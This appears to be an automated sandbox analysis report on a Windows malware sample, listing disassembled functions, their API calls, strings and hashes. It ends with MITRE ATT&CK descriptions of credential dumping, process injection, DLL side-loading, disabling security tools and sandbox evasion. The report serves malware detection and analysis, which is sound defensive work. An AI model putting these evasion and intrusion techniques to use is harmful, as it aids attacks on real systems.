Instruction ID: b48736cae8d974ed50ae83b5c36349be82e2ac6aaa9025b644e8e67031431706
Opcode Fuzzy Hash: 135190bddc8e2221944c58ddd04ec188c1dcabb349ec9edc6a7e87121659b76e
Instruction Fuzzy Hash: DC119071320209AFFF118F54DC89EBB776AEB883A8F10412AF91497391D675DC618BA0

Function 002D6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91

GetWindowRect.USER32(00000000,?), ref: 002D6C71
GetSysColor.USER32(00000012), ref: 002D6C8B

Strings

static, xrefs: 002D6C4E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: ddf482048e0d6f8378614c16e3cb2467b4f709bcdc25a4be30a65fc2c8c38f2b
Instruction ID: fc84c55a6649309b1d3a3ace8aa5e35b72f262040a8a0d483f4bfb98e79cc54f
Opcode Fuzzy Hash: ddf482048e0d6f8378614c16e3cb2467b4f709bcdc25a4be30a65fc2c8c38f2b
Instruction Fuzzy Hash: A8212C7262020AAFDF04DFA8DD49AEA7BB8FB08315F00452AFD55D2250D735E860DB60

Function 002D6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002D69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002D69B1

Strings

edit, xrefs: 002D6986

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 7ba5bc0ed149b3c3ede0eb03c5996ec197761c15968d965328724cdc840b3f3a
Instruction ID: ff356acedd500e80a464ebb1a9032ccaaa62e885e34674e72f267a6e3f9dab22
Opcode Fuzzy Hash: 7ba5bc0ed149b3c3ede0eb03c5996ec197761c15968d965328724cdc840b3f3a
Instruction Fuzzy Hash: 7611BC71520209ABEB108F74DC68AEB37AAEB053B4F504726F9A1972E0C771DC609B60

Function 002B29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002B2A41

Strings

0, xrefs: 002B2A18

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a915cd34d3862aaa366f07711444ddd25dc407249a6229581fc0106646147543
Instruction ID: a41dbca11019bee225483910cf26a6ed18fad56aa0a1c0b810ea5644e5934327
Opcode Fuzzy Hash: a915cd34d3862aaa366f07711444ddd25dc407249a6229581fc0106646147543
Instruction Fuzzy Hash: B211D032921315EBCB31EF98DC44BEA73ACAB89380F144021E855E7291D770AD1EC792

Function 002C21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002C222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002C2255

Strings

<local>, xrefs: 002C221D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: dcb37491f1a02e8bbda2ea56791fb0053a09adffe78bb4b7cf4f7f36c8ba1144
Instruction ID: 1b38990732ce0666bfd38b4e6dfc7f713b033aea8ec747729318d829d7a32818
Opcode Fuzzy Hash: dcb37491f1a02e8bbda2ea56791fb0053a09adffe78bb4b7cf4f7f36c8ba1144
Instruction Fuzzy Hash: B211C170511226FADB258F118C98FF6FBACFB06361F10832EF90546000DAB05968D6F1

Function 0026092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00253C14,003152F8,?,?,?), ref: 0026096E

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

_wcscat.LIBCMT ref: 00294CB7

Strings

S1, xrefs: 002609AE

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: S1
API String ID: 257928180-611949105
Opcode ID: 8c038cc7c6ea62d3070696c0b846da24838fafd6e62a0d4b1cf5a810647240aa
Instruction ID: cdc382f3b5805817e6041889c4c420ff0ea99b15b26e16f7ef30602d3b52f629
Opcode Fuzzy Hash: 8c038cc7c6ea62d3070696c0b846da24838fafd6e62a0d4b1cf5a810647240aa
Instruction Fuzzy Hash: 28110834A22209DB8B41FB60DC46FCE73FCEF08750B0044A2B948D3281EAB09BE85F14

Function 002A8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002A8E73

Strings

ComboBox, xrefs: 002A8E12
ListBox, xrefs: 002A8E3D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 955f5f93feb8457b768af54f93dd5231e4e5ec595dff08aaf55af345d2d11726
Instruction ID: b17d059d7e4e0bad83b2f56e9a2d3964b456ab830f77515423673168c67aa919
Opcode Fuzzy Hash: 955f5f93feb8457b768af54f93dd5231e4e5ec595dff08aaf55af345d2d11726
Instruction Fuzzy Hash: 7301F5B1A62229EBCB15EBA0CD568FE7368EF02320B004619FC31572E2DF35582CCA50

Function 002A8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 002A8D6B

Strings

ComboBox, xrefs: 002A8D0A
ListBox, xrefs: 002A8D35

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c2e00de5270c0c946c2c6696555b0f271e68d27fe32cbc17fb449ee05369b402
Instruction ID: e1ec0d0d9bf1820ce4e0318d2d60f559b129129b4fe8c9c78318b61501a7db20
Opcode Fuzzy Hash: c2e00de5270c0c946c2c6696555b0f271e68d27fe32cbc17fb449ee05369b402
Instruction Fuzzy Hash: 7301FC71A61509ABCB15EBA0C956EFE73B8DF16300F104019BC01671E1DF255E2CDAB5

Function 002A8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 002A8DEE

Strings

ComboBox, xrefs: 002A8D8F
ListBox, xrefs: 002A8DBA

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: bd4b15d34072a8e1660241451b91f9c47b88aece11a177bf3d56a2b8f77db8d8
Instruction ID: e96728436fc85187d87c277b480e94a574caf604755e0b6acffba640a8aa1699
Opcode Fuzzy Hash: bd4b15d34072a8e1660241451b91f9c47b88aece11a177bf3d56a2b8f77db8d8
Instruction Fuzzy Hash: 570126B1A62109B7CB11EBB4C956EFE77ACDF12300F104016BC02672D2DE255E2CDAB5

Function 002AC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002AC534

Part of subcall function 002AC816: _memmove.LIBCMT ref: 002AC860
Part of subcall function 002AC816: VariantInit.OLEAUT32(00000000), ref: 002AC882
Part of subcall function 002AC816: VariantCopy.OLEAUT32(00000000,?), ref: 002AC88C

VariantClear.OLEAUT32(?), ref: 002AC556

Strings

d}0, xrefs: 002AC517

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}0
API String ID: 2932060187-215453177
Opcode ID: 9b0e582d3b3d225ee139cbd15630224f365605a3d159ec43a8ea6b426d2d033c
Instruction ID: 84a4fdd3e458de975f682882b76b74c8e6228aa1c968249f9231d78e78af3c51
Opcode Fuzzy Hash: 9b0e582d3b3d225ee139cbd15630224f365605a3d159ec43a8ea6b426d2d033c
Instruction Fuzzy Hash: D8111E719017089FC720DFAAD98489AF7F8FF08310B50862FE58AD7651E771AA48CF94

Function 002B4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 002B4F46
_wcscmp.LIBCMT ref: 002B4F58

Strings

#32770, xrefs: 002B4F52

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: cf32d509c9738f8f764db7f6ccbaec530213e6d02463fed9c071c93d9c11cf14
Instruction ID: bae78f4d98c0da86a9b09a71d68b0d8ec060a7c99022dc6b9296e4fbfaac8730
Opcode Fuzzy Hash: cf32d509c9738f8f764db7f6ccbaec530213e6d02463fed9c071c93d9c11cf14
Instruction Fuzzy Hash: 7AE09232A012292AE720AB99AC4AAE7FBACEB45B70F000067FD44D3051D9709A558BE4

Function 0028B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0028B314: _memset.LIBCMT ref: 0028B321

Part of subcall function 00270940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0028B2F0,?,?,?,0025100A), ref: 00270945

IsDebuggerPresent.KERNEL32(?,?,?,0025100A), ref: 0028B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0025100A), ref: 0028B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0028B2FE

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 9d9f8e04b29f44f3b5c4258f75c11be03198124af0947c98398f30627da704c4
Instruction ID: 75ba5c8e54d49d44f7c601f5c53e7ce04239e805ddd631f8729585987e5267e9
Opcode Fuzzy Hash: 9d9f8e04b29f44f3b5c4258f75c11be03198124af0947c98398f30627da704c4
Instruction Fuzzy Hash: 85E06574521711CBD761AF24E90875277E4AF04744F00897DE846C7290E7B4E418CB61

Function 00291935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00291775

Part of subcall function 002CBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0029195E,?), ref: 002CBFFE
Part of subcall function 002CBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002CC010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0029196D

Strings

WIN_XPe, xrefs: 00291788

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 49441cfdf11da4a54c6bd9120a7aa8c3e0a7a2ad348bb1bd3134aa6c509deeaa
Instruction ID: 79f09259671a1ee083d751b4ff1814e4c1ef516e4ec15d33c6ff80c8b23964c8
Opcode Fuzzy Hash: 49441cfdf11da4a54c6bd9120a7aa8c3e0a7a2ad348bb1bd3134aa6c509deeaa
Instruction Fuzzy Hash: 3BF0C97082110BDFDF55DF92DA89AECBBF8AF08301F64009AE112A2190D7718FA4DF64

Function 002D5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002D596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002D5981

Part of subcall function 002B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC

Strings

Shell_TrayWnd, xrefs: 002D5967

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c9a6ce89812e09f4b4b0bd27c153f19753671b43d7293b711c156f9efb01ce5b
Instruction ID: 639aed9db3a6227d9b33e23218db2e224b412228fc22ee0a319f6d72ac0ac037
Opcode Fuzzy Hash: c9a6ce89812e09f4b4b0bd27c153f19753671b43d7293b711c156f9efb01ce5b
Instruction Fuzzy Hash: 29D0C73579531176D6A47770AD5FFD66614AB00750F040425B7569A1D0D9E09800C658

Function 002D5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002D59AE
PostMessageW.USER32(00000000), ref: 002D59B5

Part of subcall function 002B5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC

Strings

Shell_TrayWnd, xrefs: 002D59A7

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d2c6cdfebd8f426df9e3f13224ef7800a980914176b171e4a8c3ee2aadb4c53f
Instruction ID: 5bcc2eabcd82cf830f0a0bfdf1ff06c224e542dfb899e4e363f1985510816798
Opcode Fuzzy Hash: d2c6cdfebd8f426df9e3f13224ef7800a980914176b171e4a8c3ee2aadb4c53f
Instruction Fuzzy Hash: 55D0C9317823117AEAA8BB70AD5FFD66614AB05B50F080826B756AA1D0D9E0A800CA98

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

